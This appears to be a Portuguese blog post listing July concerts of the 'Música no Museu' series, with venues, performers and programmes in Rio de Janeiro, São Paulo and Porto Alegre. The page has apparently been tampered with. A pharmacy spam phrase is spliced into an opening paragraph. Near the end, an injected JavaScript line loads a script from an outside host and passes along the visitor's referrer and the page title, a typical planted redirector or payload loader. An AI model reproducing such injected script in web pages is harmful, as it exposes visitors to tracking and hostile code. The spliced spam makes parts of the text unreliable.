LateralMovimento

"Música no Museu": Música Antiga é a atração do mês

Música no Museu dá ênfase à Música Antiga, como é costume, neste mês de julho, com muitas atrações, diversos locais e entrada franca.

Dentre os destaques da programação, Música Antiga da Uff, no Museu Nacional de Belas Artes; Quadro Antiquo, no Arquivo Nacional; Signorine  (Música Barroca),  no Museu da República, Duo de violas da Gamba, Kristina Augustin e Mario Orlando  no Centro Cultural Justiça Federal e Madrigal Cruz Lopes, entre outros.

Ainda neste mês, o Música no Museu comemora a inserção de mais um espaço na Série, a Paróquia Santa Mônica, localizada no Leblon, onde teremos concertos barrocos, juntamente com a música sacra. Outra novidade na série é a volta dos concertos no Museu buy generic cialis us company de História da Medicina do Rio Grande do Sul.

O pianista Pablo Lapidusas, que se lança em uma carreira internacional iniciada com a sua apresentação de Música no Museu  Internacional em 2010 no palácio Foz, em Lisboa,  despede-se  do Brasil em um concerto especial no Museu de Arte Moderna, no dia 17. Para finalizar a programação, teremos a Polifonia Carioca, regida pelo maestro Ueslei Banus, no Palácio São Clemente, no dia 30.

Serão 24 concertos no Rio de Janeiro e, com os 5 de São Paulo e 1 do Rio Grande do Sul, totalizam  30. Além disto, a convite dos seus promotores, Música no Museu estará presente no XI Congresso Mundial de Harpas em Vancouver, no Canadá dando sequência ao vitorioso RioHarpFestival.

RIO DE JANEIRO


Dia 01 –  Sexta-feira  –  12h30

Centro Cultural Justiça do Trabalho
Av. Presidente Antônio Carlos, 251  –  térreo  –  Centro

Músico: Música Indiana Brasil – Sandro Shankara (cordas), Jaffer Ferreira (percussão) e Paramatma Cristophe (flautas)Programa: Música Indiana
Dia 02  –  Sábado  –  11h30

Museu Parque das Ruínas
Rua Murtinho Nobre, 169 – Santa Tereza

Músico: André Trindade,  violão
Programa: H. Villa-Lobos,  André Trindade,  J.S. Bach.
Dia 03  –  Domingo  –  11h30

Museu de Arte Moderna
Av. Infante Dom Henrique, 85 – Pq. do Flamengo

Músico: Al Nur Kibir  – Maxwell de Oliveira, violonista e alaudista, Radoslav Mirianov, compositor e arranjador, José Amâncio (Yussef), percussionista; Jaffer, percussionista.
Participação especial: Jamillah Saleemah e Saada Kasatly,  bailarinas
Programa: Música Árabe
Dia 04  –  Segunda-feira  –  12h30

Biblioteca Nacional
Rua México, s/n – Centro

Músico: Gonzalo Saldarriaga, violão
Programa: Miguel de Fuenllana,  Alonso Mudarra,  Luis Milán, Luiz  Naváez.
Dia 06  –  Quarta-feira  –  15h.

Paróquia Santa Mônica
Av. Ataulfo de Paiva,  527 (entre Cupertino Durão e José Linhares) – Leblon

Músico: Duo Emer – Andrei Vanazzi, alaúde e Michelle Leggero, soprano
Programa: Antonio Capiroli, Marchetto Cara, Claudin de Semisy,  Jehan Chardavoine.
Dia 07  –  Quinta-feira  –  12h30

Museu Nacional de Belas Artes
Av. Rio Branco, 199 – Centro

Músico: Música Antiga da UFF
Programa: Alfonzo X, o sábio
Dia 08  –  Sexta-feira  –  15h.

Centro Cultural Justiça Federal
Av. Rio Branco, 241 – Centro

Músico: Carla Pacheco, voz e Dilia Tosta, piano
Programa: Händel, J. S. Bach, Giulio Caccini, Francesco Giordani.
Dia 09  –  Sábado  –  11h30

Museu Parque das Ruínas
Rua Murtinho Nobre, 169 – Santa Tereza

Músico: Gonzalo Saldarriaga, violão
Programa: : John Dowland, Anthony Holbome, Francis Cutting, Philip Rosester, Michael Praetorius
Dia 10  –  Domingo  –  11h30

Museu de Arte Moderna
Av. Infante Dom Henrique, 85 – Pq. do Flamengo

Músico: Anne Meyer, soprano e Cláudia Feitosa,  piano
Programa: Modinhas Imperiais – J. M. de Souza Barros, Cândido Ignácio da Silva, A. J. S. Monteiro,  Tomás Antonio Gonzaga.
Dia 12  –  Terça-feira  –  12h30

Arquivo Nacional
Praça da República, 173 – Centro

Músico: Quadro Antiquo – Kristina Augustin, Mário Orlando, Rosimary P. Gomes e Sonia Wegenast
Programa: Pedro de Escobar, Manuel Machado, Pedro de Pastrana, Juan Del Encina.
Dia 13  –  Quarta-feira  –  19h30

Paróquia Santa Mônica
Av. Ataulfo de Paiva,  527 (entre Cupertino Durão e José Linhares) – Leblon

Músico: Madrigal Cruz  Lopes
Regente: José Machado Neto
Pianista: Regina Tatagiba
Programa: Armando Prezeres, Franz Schubert, Charles Gounoud, Bonaventura Soma, Messiah Händel.
Dia 14  –  Quinta-feira  –  12h30

Clube de Engenharia
Av. Rio Branco, 124 – Centro

Músico:  Kristina  Augustin, viol

a
Programa: Benjamin Hely, Diego Ortiz, Domenico Gabrieli, Tobias Hume, Demachy, J. S. Bach.
Dia 15  –  Sexta-feira  –  15h.

Centro Cultural Justiça Federal
Av. Rio Branco, 241 – Centro

Músico: Grupo Kaleidos – Rubens Küffer, flauta doce – Álvaro Carriello, violino – Priscila Alencastre,violino – Ulisses Nogueira, viola – Rodrigo Alencastre, violoncelo e Rita Cabus, cravo.
Programa: G. P. Teleman,  G. F. Händel, G. Bassano, J. Stamitz, A. Vivaldi.
Dia 16  –  Sábado  –  11h30

Museu Parque das Ruínas
Rua Murtinho Nobre, 169 – Santa Tereza

Músico: Trio Boismortier – Maycon Lack, Ramon Múrcia e Felipe Marateo – flautas
Programa: Joseph Bodin de boismortier,  Johann Matteson.
Dia 17  –  Domingo  –  11h30

Museu de Arte Moderna
Av. Infante Dom Henrique, 85 – Pq. do Flamengo

Músico: Pablo Lapidusas, piano – Concerto  Despedida do Brasil
Programa:  Alberto Ginastera, Astor Piazzolla, Pablo Lapidusas, Tom Jobim, Edu Lobo, Egberto Gismonti.
Dia 19  –  Terça-feira  –  12h30

Museu da República
Rua do Catete, 153 – Catete

Músico: Signorine – Anne Meyer, soprano – Vilma Trindade, violino e Érica Machado, piano
Programa: Música Barroca – Domenico Scarlatti, Alessandro Scarlatti, Maurizio Cazzatti, Giovanni Maria Bononcini, Carlo Francesco Cesarini.
Dia 20  –  Quarta-feira  –  15h.

Paróquia Santa Mônica
Av. Ataulfo de Paiva,  527 (entre Cupertino Durão e José Linhares) – Leblon

Músico: Duo Emer – Andrei Vanazzi, alaúde e Michelle Leggero, soprano
Programa: Antonio Capiroli, Marchetto Cara, Claudin de Semisy,  Jehan Chardavoine.
Dia 21  –  Quinta-feira  –  18h.

Centro Cultural Justiça Federal
Av. Rio Branco, 241 – Centro

Músico: Duo de Violas da Gamba – Kristina Augustin e Mário Orlando
Programa: John Hingeston,  Orlando Gibbons,  Michael East,  Tobias Hume,  Christof Simpson.
Dia 24  –  Domingo  –  11h30

Museu de Arte Moderna
Av. Infante Dom Henrique, 85 – Pq. do Flamengo

Músico: Helen Heinzle,soprano – Leonardo La Greca, barítono e Eliara Pugina, piano.
Programa: Encontro com a Ópera Barroca – Cláudio Morteverdi, George Frederic Handel,  Antonio Vivaldi,  Giovanni Battista Pergolesi.
Dia 26  –  Terça-feira  –  18h.

Museu do Exército – Forte de Copacabana
Praça Cel. Eugênio Franco, 1 – Posto 6

Músico: Madrigal Cruz Lopes
Maestro: JOSÉ MACHADO NETO
Programa: Mozart, Tom Jobim, Adrian Willaert, Astor Piazzola.
Dia 27  –  Quarta-feira  –  15h.

Paróquia Santa Mônica
Av. Ataulfo de Paiva,  527 (entre Cupertino Durão e José Linhares) – Leblon

Músico: Duo Oazem-Rodrigues – Laila Oazem, soprano e Felipe Rodrigues, violão
Programa: H. Schütz ,  H. Purcell,  W. Walton.
Dia 28  –  Quinta-feira  –  12h30

Museu Nacional de Belas Artes
Av. Rio Branco, 199 – Centro

Músico: Grupo Kaleidos – Rubens Küffer, flauta doce – Álvaro Carriello, violino – Priscila Alencastre,violino – Ulisses Nogueira, viola – Rodrigo Alencastre, violoncelo e Rita Cabus, cravo.
Programa: Programa: G. P. Teleman,  G. F. Händel, G. Bassano, J. Stamitz, A. Vivaldi.
Dia 29  –  Sexta-feira  –  12h30

Museu Histórico Nacional
Praça Marechal Âncora, s/n – Centro

Músico: Trio Boismortier – Maycon Lack, Ramon Múrcia e Felipe Marateo – flautas
Programa: Joseph Bodin de boismortier,  Johann Matteson.
Dia 30  –  Sábado  –  18h.

Palácio São Clemente
Rua São Clemente, 424 – Botafogo

Músico: Coro Polifonia Carioca
Sylvia Thereza e Cristina Nascimento, piano a 4 mãos
Direção Musical e Regência: Ueslei Banus
Programa: J. Brahms,  F. Chopin,  F. Liszt.

SÃO PAULO

Museu da Casa Brasileira  –  11h.
Av. Brigadeiro Faria Lima, 2705 – Jardim Paulista

Dia 03 – Elder Costa e grupo – lançamento do CD Meus Olhos, Duas Sementes

Dia 10 –  Mirco Bacarini – acordeon solo

Dia 17 – Neymar Dias e convidados – Viola Caipira

Dia 24 – Amoy Ribas Quarteto – música instrumental brasileira

Dia 31 – Movimento Sincopado – Allan Abbadia e Camundongos.

PORTO ALEGRE

Museu de História da Medicina do Rio Grande do Sul (MUHM) – 18h30
Sala Rita Lobato do MUHM
Av. Independência, 270 – Centro Histórico de Porto Alegre

Dia 07 – Sarau Lírico Mensal

Músico: Quarteto Anonymmi Quattuor – Letícia Grützmann – Contralto, Lucas Alves – Tenor e Vicente Casanova – Barítono e Diretor Artístico.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Antônio Rodrigues
Apaixonado por música coral, é um dos fundadores e mantenedor do movimento.com.